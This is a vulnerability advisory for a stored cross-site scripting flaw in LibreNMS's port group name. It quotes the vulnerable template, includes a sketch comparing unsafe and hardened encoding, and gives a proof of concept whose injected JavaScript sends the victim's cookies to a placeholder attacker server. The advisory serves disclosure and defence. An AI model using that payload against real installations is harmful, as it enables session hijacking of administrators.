
LibreNMS Port Group Name Stored Cross-Site Scripting Risk

CVE-2026-26992 GHSA-93fx-g747-695x
Summary

LibreNMS has a stored cross-site scripting issue that allows attackers with admin privileges to inject malicious JavaScript into the application. This can happen when an attacker creates a port group with a specially crafted name. To fix this, LibreNMS needs to be updated to properly sanitize user input in the port group name.

What to do

No fix is available yet. Check with your software vendor for updates.

Affected software
| Vendor | Product | Affected versions | Fix available |
| --- | --- | --- | --- |
| librenms | librenms | <= 26.2.0 | – |

Original title
LibreNMS /port-groups name Stored Cross-Site Scripting
Original description
### Summary
**/port-groups name Stored Cross-Site Scripting**

- HTTP POST
- Request-URI(s): "/port-groups"
- Vulnerable parameter(s): "name"
- Attacker must be authenticated with "admin" privileges.
- When a user adds a port group, an HTTP POST request is sent to the Request-URI "/port-groups". The name of the newly created port group is stored in the value of the name parameter.
- After the port group is created, the entry is displayed along with some relevant buttons like Edit and Delete.

### Details
The vulnerability exists because the name of the port group is not sanitized of HTML/JavaScript-related characters or strings. When the delete button is rendered, the following template is used to render the page:

_resources/views/port-group/index.blade.php:_
```
@extends('layouts.librenmsv1')
@section('title', __('Port Groups'))
@section('content')
<div class="container-fluid">
<x-panel id="manage-port-groups-panel">
{{-- [...Truncated...] --}}
@foreach($port_groups as $port_group)
{{-- [...Truncated...] --}}

{{-- The port group's name is used in the Delete button's onclick handler without sanitizing for XSS-related characters/strings --}}
<button type="button" class="btn btn-danger btn-sm" title="{{ __('delete Port Group') }}" aria-label="{{ __('Delete') }}"
        onclick="delete_pg(this, '{{ $port_group->name }}', '{{ route('port-groups.destroy', $port_group->id) }}')">
```

As the port group's name is not sanitized of HTML/JavaScript-related characters or strings, this can result in stored cross-site scripting.
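
An added example (not LibreNMS code) of the context mismatch in the template above: Blade's `{{ }}` HTML-encodes the name, but the browser decodes an attribute value before compiling it as JavaScript, so a quote in the name still ends the string passed to `delete_pg`. The sketch models that in JavaScript and contrasts it with encoding for the JS string first and the HTML attribute second; `renderVulnerable`, `renderHardened`, `simulateClick`, `probe` and the sample values are hypothetical and constructed.

```javascript
// Added example, not LibreNMS code. Models the Blade output and the browser's
// handling of an onclick attribute; all names below are hypothetical.

// The five characters PHP's htmlspecialchars() (used by Blade's {{ }}) encodes.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };
const htmlEscape = (s) => String(s).replace(/[&<>"']/g, (c) => ENTITIES[c]);

// The HTML parser decodes entities in an attribute value BEFORE the value is
// compiled as JavaScript (only the entities above are modelled here).
const DECODE = { amp: '&', lt: '<', gt: '>', quot: '"', '#039': "'" };
const decodeAttribute = (s) => s.replace(/&(amp|lt|gt|quot|#039);/g, (_, e) => DECODE[e]);

// Template as on the page: HTML-escaped name inside a single-quoted JS string.
function renderVulnerable(name, url) {
  return `delete_pg(this, '${htmlEscape(name)}', '${htmlEscape(url)}')`;
}

// Hardened: encode for the inner context first (JS string literal via
// JSON.stringify), then for the outer context (HTML attribute).
function renderHardened(name, url) {
  return `delete_pg(this, ${htmlEscape(JSON.stringify(name))}, ${htmlEscape(JSON.stringify(url))})`;
}

// Compile the decoded attribute the way a click would, with stub functions,
// and report what the handler did.
function simulateClick(attrValue) {
  const seen = { names: [], extraCodeRan: false };
  const handler = new Function('delete_pg', 'probe', decodeAttribute(attrValue));
  handler.call({}, (_el, name) => seen.names.push(name), () => { seen.extraCodeRan = true; });
  return seen;
}

// Constructed, harmless name with the same quote-breaking shape as the PoC.
const SAMPLE_NAME = "pg'); probe(); delete_pg(this, 'pg";
const SAMPLE_URL = '/port-groups/1';

const vulnerable = simulateClick(renderVulnerable(SAMPLE_NAME, SAMPLE_URL));
const hardened = simulateClick(renderHardened(SAMPLE_NAME, SAMPLE_URL));
console.log('vulnerable:', vulnerable);
console.log('hardened:  ', hardened);
```

With the hardened rendering the handler calls `delete_pg` once and receives the whole name as data; with the template's rendering the extra statement runs.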

### PoC
- Login
- Select Ports > Manage Port Groups
- Select New Port Group
- Input `12345');var pt=new Image();pt.src='http://<ATTACKER_IP>/cookiePG'.concat(document.cookie);document.body.appendChild(pt);delete_pg(this, '12345` into the "Name" input box (change `<ATTACKER_IP>` to be the IP of an attacker-controlled webserver)
- Select Save
- Select the Delete Icon for the newly created Port Group
- Select OK
- The JavaScript payload is not sanitized and an HTTP request will be sent to the attacker-controlled server, leaking the user's cookies.
nvd CVSS3.1 4.8
nvd CVSS4.0 5.1
Vulnerability type
CWE-79 Cross-site Scripting (XSS)
Published: 18 Feb 2026 · Updated: 11 Mar 2026 · First seen: 6 Mar 2026